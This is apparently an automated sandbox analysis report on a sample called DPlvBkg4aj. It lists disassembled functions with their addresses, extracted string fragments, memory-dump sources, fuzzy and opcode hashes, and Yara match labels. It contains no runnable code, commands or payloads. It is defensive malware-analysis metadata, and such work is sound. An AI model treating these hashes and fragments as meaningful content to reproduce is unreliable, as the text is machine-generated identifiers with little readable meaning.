Instruction ID: 099b8e97d4c783248d299f08155666f1876e613e1bac2d45a50adfc1c6749069
Opcode Fuzzy Hash: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
Instruction Fuzzy Hash: B8C1167221C3918BD3258F29D49076BBFE2AFD3304F18896DE4D44B3C6D679890AC796

Function 00669507 Relevance: 6.7, Strings: 5, Instructions: 452COMMON

Download Yara Rule

Strings

C, xrefs: 00669874
RRP\, xrefs: 006699A5
!oW1, xrefs: 00669631
#"2., xrefs: 00669629
P, xrefs: 006696F2

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: !oW1$#"2.$C$P$RRP\
API String ID: 0-2182630447
Opcode ID: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
Instruction ID: 913c23d5e1b03f1acf09c3edf7f045069960b9c4e82fada4fe8ecaa09977b015
Opcode Fuzzy Hash: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
Instruction Fuzzy Hash: 6DC1E47121C3914BD3258F29C4917ABBFE2AFE3304F18896DE4D54B386D679850AC7A2

Function 00429FE4 Relevance: 6.7, Strings: 5, Instructions: 437COMMON

Download Yara Rule

Strings

lvhu, xrefs: 0042A34B
,fbV, xrefs: 0042A353
sf, xrefs: 0042A36B
d~`}, xrefs: 0042A35B
ooKv, xrefs: 0042A363

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: ,fbV$d~`}$lvhu$ooKv$sf
API String ID: 0-4157365443
Opcode ID: d0a6585cca3ad9a47c54e6056bc46f80964016baf11be8ce0a27bf085c007181
Instruction ID: aaedd27545ab9ed709b9694aed24c663919bae5b675873c34d327438eaef385a
Opcode Fuzzy Hash: d0a6585cca3ad9a47c54e6056bc46f80964016baf11be8ce0a27bf085c007181
Instruction Fuzzy Hash: 14E139B15483518FD714CF24D8817ABB7E2AFD1304F48896DE9D587382E679E908C78B

Function 00409790 Relevance: 6.7, Strings: 5, Instructions: 415COMMON

Download Yara Rule

Strings

*+, xrefs: 00409B1E
kh, xrefs: 00409BE3
nz, xrefs: 004098E3
2B309B639C22768FD0632DF0E28DC412, xrefs: 0040982C
{u, xrefs: 00409A7E

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: *+$2B309B639C22768FD0632DF0E28DC412$kh$nz${u
API String ID: 0-4195480381
Opcode ID: 0a6dafd6ef2ba7b0d43a2a51019282152f096bc3ad18055503bec8102e7ee30b
Instruction ID: 1b29a9faac5300f3ffc5f62fe3d46617b85d137f0c3ce0abae63967b27c05819
Opcode Fuzzy Hash: 0a6dafd6ef2ba7b0d43a2a51019282152f096bc3ad18055503bec8102e7ee30b
Instruction Fuzzy Hash: 2AD103716087508BD724DF35C851BABBBE2EFC1318F18896DE4D59B392D638C809CB46

Function 006699F7 Relevance: 6.7, Strings: 5, Instructions: 415COMMON

Download Yara Rule

Strings

{u, xrefs: 00669CE5
*+, xrefs: 00669D85
nz, xrefs: 00669B4A
kh, xrefs: 00669E4A
2B309B639C22768FD0632DF0E28DC412, xrefs: 00669A93

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: *+$2B309B639C22768FD0632DF0E28DC412$kh$nz${u
API String ID: 0-4195480381
Opcode ID: 2082c0a74a3eb7ff3a029c135b348d841f3ea5b4eda3e8b99a1f11572f93b6ec
Instruction ID: 6b60f03da6aa5f4f154f3caea470076323979026e1bb2d40dc870530013075e6
Opcode Fuzzy Hash: 2082c0a74a3eb7ff3a029c135b348d841f3ea5b4eda3e8b99a1f11572f93b6ec
Instruction Fuzzy Hash: 26D104716087508BD724DF38C891BABBBE6EFC1318F18896DE4D68B392D634C409CB56

Function 0068A305 Relevance: 6.7, Strings: 5, Instructions: 407COMMON

Download Yara Rule

Strings

sf, xrefs: 0068A5D2
ooKv, xrefs: 0068A5CA
,fbV, xrefs: 0068A5BA
lvhu, xrefs: 0068A5B2
d~`}, xrefs: 0068A5C2

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: ,fbV$d~`}$lvhu$ooKv$sf
API String ID: 0-4157365443
Opcode ID: ac8608a635378d5c383f0645017db4dbb6ad6197584878f05415f6d5cdf6d11e
Instruction ID: d383ea4f463aeecf3641b16604fc5b9a072a1570036bf544bbec59ad2e612d54
Opcode Fuzzy Hash: ac8608a635378d5c383f0645017db4dbb6ad6197584878f05415f6d5cdf6d11e
Instruction Fuzzy Hash: 9CD139B15083814BD724DF54C8917ABB7E3AFD1314F088A2DE9D58B342E679DA09C786

Function 0042FCBC Relevance: 5.3, Strings: 4, Instructions: 335COMMON

Download Yara Rule

Strings

BVAI, xrefs: 0042FF6A
t, xrefs: 0042FCCC
mc, xrefs: 0042FDF9
_Pna, xrefs: 0042FD26

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: BVAI$_Pna$mc$t
API String ID: 0-1770441902
Opcode ID: a6be79c1421af0b4b0c922728e2635db4fbde982ee4162c8bdd7ea1edf433783
Instruction ID: 048c6723a0782cba0ed5f5bfde42b0dc355c8231af3653691a455654dcaa2d5e
Opcode Fuzzy Hash: a6be79c1421af0b4b0c922728e2635db4fbde982ee4162c8bdd7ea1edf433783
Instruction Fuzzy Hash: 03A1C37050C3D18AE739CF2594103ABBBE1AFD7304F58897ED0D997382DB79814A8B5A

Function 0042EA62 Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

8<j?, xrefs: 0042ED50
0, xrefs: 0042ED00
D, xrefs: 0042ED68
4b, xrefs: 0042EDDA

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 0$8<j?$D$4b
API String ID: 0-1320392364
Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A

Function 0068ECC9 Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

0, xrefs: 0068EF67
8<j?, xrefs: 0068EFB7
D, xrefs: 0068EFCF
4b, xrefs: 0068F041

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8<j?$D$4b
API String ID: 0-1320392364
Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction ID: fd6638cf8cfa07b390aa4f76e1f012a686f2574ef5c6d54bb7b4c0a6c8de1320
Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction Fuzzy Hash: 2791F67024C3818BD718DF3988A536AFBD29FD6314F288A6DE4D68B391D279C50AC716

Function 0042A9F7 Relevance: 5.3, Strings: 4, Instructions: 328COMMON

Download Yara Rule

Strings

v, xrefs: 0042ACB0
bt, xrefs: 0042AE84
v, xrefs: 0042AE45, 0042AE5D, 0042ADD1, 0042AD90, 0042AB80, 0042AC4B, 0042ABC1, 0042AC34
zi, xrefs: 0042AE8C

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: v$v$bt$zi
API String ID: 0-1945541540
Opcode ID: 295c829244e78f24e812d08f7068f6e887247ac70f2c98393ecae3702f4aeb52
Instruction ID: bba7ce1cbd9d7b5964ace128991244c7d88d52c60c2cfa081a52f8c92ce1e01e
Opcode Fuzzy Hash: 295c829244e78f24e812d08f7068f6e887247ac70f2c98393ecae3702f4aeb52
Instruction Fuzzy Hash: 48D1687260C3558FD725CF28D45069FFBE6EBC4304F06892DE8A99B281D774D60ACB86

Function 00442D20 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

@+p, xrefs: 00442E66, 00442F3A
D`a&, xrefs: 00442ED5
NMNO, xrefs: 00442E20
bX_^, xrefs: 00442D22

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: InitializeThunk
String ID: @+p$D`a&$NMNO$bX_^
API String ID: 2994545307-1848465628
Opcode ID: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
Opcode Fuzzy Hash: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759

Function 0041825B Relevance: 5.2, Strings: 4, Instructions: 231COMMON

Download Yara Rule

Strings

gfff, xrefs: 004183EA
@+p, xrefs: 0041852E
7, xrefs: 004183A3
), xrefs: 0041837A

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: )$7$@+p$gfff
API String ID: 0-2856442284
Opcode ID: 65dc81d769e5c8ee4e27a7d15ee325795d27feb2d3b9459f78503db774decfd6
Instruction ID: 9f03ba7914f0360cb7709cea8ad3b28f347f0d2189de7c473bd193f5a0b7fd0c
Opcode Fuzzy Hash: 65dc81d769e5c8ee4e27a7d15ee325795d27feb2d3b9459f78503db774decfd6
Instruction Fuzzy Hash: D4812572A142118BD324CF28DC417AB77E2EBC8314F18C92ED985DB395EB3CD8468785

Function 006784C2 Relevance: 5.2, Strings: 4, Instructions: 231COMMON

Download Yara Rule

Strings

), xrefs: 006785E1
7, xrefs: 0067860A
gfff, xrefs: 00678651
@+p, xrefs: 00678795

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: )$7$@+p$gfff
API String ID: 0-2856442284
Opcode ID: 60e49d7894c15ae3aa33853dce523991c204049145f125d3a07e5eda309779ae
Instruction ID: 62e689a9de903352113d68d2f696d3a7fca2ebcb8f48b2a78f9ee91e4cf231ea
Opcode Fuzzy Hash: 60e49d7894c15ae3aa33853dce523991c204049145f125d3a07e5eda309779ae
Instruction Fuzzy Hash: 84811672A542518FD328CF28CC557AF77D2ABC4314F18C92DE48ADB395DB38D9068B85

Function 006873B2 Relevance: 5.2, Strings: 4, Instructions: 205COMMON

Download Yara Rule

Strings

FOOE, xrefs: 0068756E
UUQg, xrefs: 0068758A
KGFU, xrefs: 0068757C
KGFU, xrefs: 00687628, 0068762B

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: FOOE$KGFU$KGFU$UUQg
API String ID: 0-60738199
Opcode ID: 6cf9c5cec0f80acf9d2adc729e7b0a961c5be7fa5a2f2669f24e8ed63becf1bb
Instruction ID: 9fbdf2369ad8dfa1ce37d3d0d4666b0648934fb4843f35266bf386a5e6dd8b64
Opcode Fuzzy Hash: 6cf9c5cec0f80acf9d2adc729e7b0a961c5be7fa5a2f2669f24e8ed63becf1bb
Instruction Fuzzy Hash: 03516C729492528FDB10DF68C8801E9FBA3EF55320B3E4769C8559B381E734ED06D392

Function 00685D57 Relevance: 5.1, Strings: 4, Instructions: 132COMMON

Download Yara Rule

Strings

K3, xrefs: 00685EB1
B:, xrefs: 00685E9D
C@, xrefs: 00685EA7
bX_^, xrefs: 00685E24

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: B:$C@$K3$bX_^
API String ID: 0-595269213
Opcode ID: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
Instruction ID: 134c837a0e9381aa9d4d8269a2df4eee30fe16dd6c0ff314ce018bccb8ca7c2d
Opcode Fuzzy Hash: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
Instruction Fuzzy Hash: 5541C1B5D102289FDB20EF79CD867DDBFB1AB85300F4442AAE448A7355D6340E498FD2

Function 00414C20 Relevance: 4.7, Strings: 3, Instructions: 989COMMON

Download Yara Rule

Strings

@+p, xrefs: 0041505F, 004150F8, 00415195, 00415237, 004152CF, 00415330, 00415390, 004153F1, 004156A6
UA, xrefs: 004155D4
NP,?, xrefs: 00415070

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: @+p$NP,?$UA
API String ID: 0-2890936240
Opcode ID: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
Opcode Fuzzy Hash: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789

Function 006820D7 Relevance: 4.2, Strings: 3, Instructions: 435COMMON

Download Yara Rule

Strings

(ijkdefgau`c, xrefs: 00682225
defgau`c, xrefs: 00682231
au`c, xrefs: 0068222D

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: (ijkdefgau`c$au`c$defgau`c
API String ID: 0-3415814675
Opcode ID: 9e8d5e03b0b2b75bc4d5eda427d96198f973e9ec1b0f4896e10352321ad71037
Instruction ID: 22373042e6190ff3b2a1ea00fd9c15183cfd422f43746a7303527dcb98dcf8c9
Opcode Fuzzy Hash: 9e8d5e03b0b2b75bc4d5eda427d96198f973e9ec1b0f4896e10352321ad71037
Instruction Fuzzy Hash: FBD1CFB16083419FD714DF68C8A1AABBBE2EFC5314F148A2CE9858B391E775D805CB52

Function 00434CEF Relevance: 4.2, Strings: 3, Instructions: 429COMMON

Download Yara Rule

Strings

., xrefs: 00434DE2
$, xrefs: 00434DE6
K, xrefs: 00434DDE

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: $$.$K
API String ID: 0-4278605028
Opcode ID: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
Instruction ID: 6a15d43e6d9dc7541644536baa1fca88b34eed3a23bb6af0385b7f8a4183f52c
Opcode Fuzzy Hash: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
Instruction Fuzzy Hash: 69029E71614BC08BE3158F3DC891392BFE2AB56304F1CC9AED4DACB787C229E5458B65

Function 0042B170 Relevance: 4.2, Strings: 3, Instructions: 428COMMON

Download Yara Rule

Strings

{wBy, xrefs: 0042B538
@+p, xrefs: 0042B4A6, 0042B6D6
?;;, xrefs: 0042B3AA

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: @+p${wBy$?;;
API String ID: 0-3082507307
Opcode ID: ae1563bb26e5b034f74fb841f5d8e6b326ce722d7a4ccc89e03eadf425dba48e
Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
Opcode Fuzzy Hash: ae1563bb26e5b034f74fb841f5d8e6b326ce722d7a4ccc89e03eadf425dba48e
Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A

Function 0042EB5F Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68
4b, xrefs: 0042EDDA

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A

Function 0042EBB3 Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68
4b, xrefs: 0042EDDA

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A

Function 0068EDC6 Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

8<j?, xrefs: 0068EFB7
D, xrefs: 0068EFCF
4b, xrefs: 0068F041

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction ID: 35103dfef44bffaedb97d12cc4cd786928890306bcc13c0f8a5918179b30c8aa
Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction Fuzzy Hash: E281F97024C3818BD719DF3988A137AFBD29FE6314F288A6DE4D28B381D279C506C716

Function 00408F90 Relevance: 4.1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

Strings

#=0, xrefs: 00408FC5
Z, xrefs: 004090E8
ut, xrefs: 004090E1

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: #=0$Z$ut
API String ID: 0-1971374411
Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction ID: eba545bab416a68370d8833e2e81319f1cd74d48ef4740c2d23370f5f56f4d51
Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction Fuzzy Hash: 4681E23120C7829AD7058F39845026BBFE1AFA7314F1889AED4D1AB3C7D639C90AC756

Function 006691F7 Relevance: 4.1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

Strings

ut, xrefs: 00669348
Z, xrefs: 0066934F
#=0, xrefs: 0066922C

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: #=0$Z$ut
API String ID: 0-1971374411
Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction ID: ecbaebae1c1e78ee5fb365110da2cc67eb43d5a9dab39d984f748a6f3d73a0de
Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction Fuzzy Hash: 7981183110C3828AD7058F39C4507BAFFE69FA3314F1899ADD4D19B796D639C50AC762

Function 0042EBA1 Relevance: 4.0, Strings: 3, Instructions: 290COMMON

Download Yara Rule

Strings

8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68
4b, xrefs: 0042EDDA

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A

Function 00427133 Relevance: 4.0, Strings: 3, Instructions: 219COMMON

Download Yara Rule

Strings

FOOE, xrefs: 00427307
KGFU, xrefs: 00427315
UUQg, xrefs: 00427323

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: FOOE$KGFU$UUQg
API String ID: 0-2281124432
Opcode ID: aa3e6234d37e5ff48adc82abd2c06de17444a92e0354e9c2c603a59569284f89
Instruction ID: e3d0f05a3102c402a5be3d16b6d50dde008b8d5973f854c9b7a8b98ef3316d4d
Opcode Fuzzy Hash: aa3e6234d37e5ff48adc82abd2c06de17444a92e0354e9c2c603a59569284f89
Instruction Fuzzy Hash: 9A619D72B49262CFD710CBA4D8402AAF7A2EF55310B5D42ABD8558B382E33CDD12D3A5

Function 0041AF24 Relevance: 3.9, Strings: 3, Instructions: 196COMMON

Download Yara Rule

Strings

5230, xrefs: 0041AFC1
t]ae, xrefs: 0041B081
I`af, xrefs: 0041B038

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 5230$I`af$t]ae
API String ID: 0-812676372
Opcode ID: 69b55e9c59f984ca031ddda7f553905b2866cdbf307ebf2f1898f1c112d00d2e
Instruction ID: cc3bff843b66776ddd05c04f0bda8cfb631fd3a3b5e3538274f97fe5caba7e22
Opcode Fuzzy Hash: 69b55e9c59f984ca031ddda7f553905b2866cdbf307ebf2f1898f1c112d00d2e
Instruction Fuzzy Hash: D7515972A15B804FD738CF66C891767BBE3ABA5304F19896DC1C287695DABCA405C704

Function 0067B18B Relevance: 3.9, Strings: 3, Instructions: 196COMMON

Download Yara Rule

Strings

5230, xrefs: 0067B228
t]ae, xrefs: 0067B2E8
I`af, xrefs: 0067B29F

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: 5230$I`af$t]ae
API String ID: 0-812676372
Opcode ID: 99ad52d241a312d1886458a9d982083b732080c3046440976dde46d31c833c5f
Instruction ID: ced7d334458393d5ea4f61e387bace60f38ebf12390045077b570ae43a120bc9
Opcode Fuzzy Hash: 99ad52d241a312d1886458a9d982083b732080c3046440976dde46d31c833c5f
Instruction Fuzzy Hash: CC513772A15B808FD739CF65C891B67BBE3BBA1304F1D896DC1C2C7696DAB9A405C700

Function 0041DAD0 Relevance: 3.9, Strings: 3, Instructions: 156COMMON

Download Yara Rule

Strings

A, xrefs: 0041DC18
5230, xrefs: 0041DB20
1, xrefs: 0041DBA3

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 1$5230$A
API String ID: 0-2921844354
Opcode ID: 2f0b92b3633f1c98435bd7295618cc795514d651c00833ac90ced833c2e04a77
Instruction ID: e76a71f95e24524307293e01d01a6f58a23ad2f1a40c0433447d02162c8ae966
Opcode Fuzzy Hash: 2f0b92b3633f1c98435bd7295618cc795514d651c00833ac90ced833c2e04a77
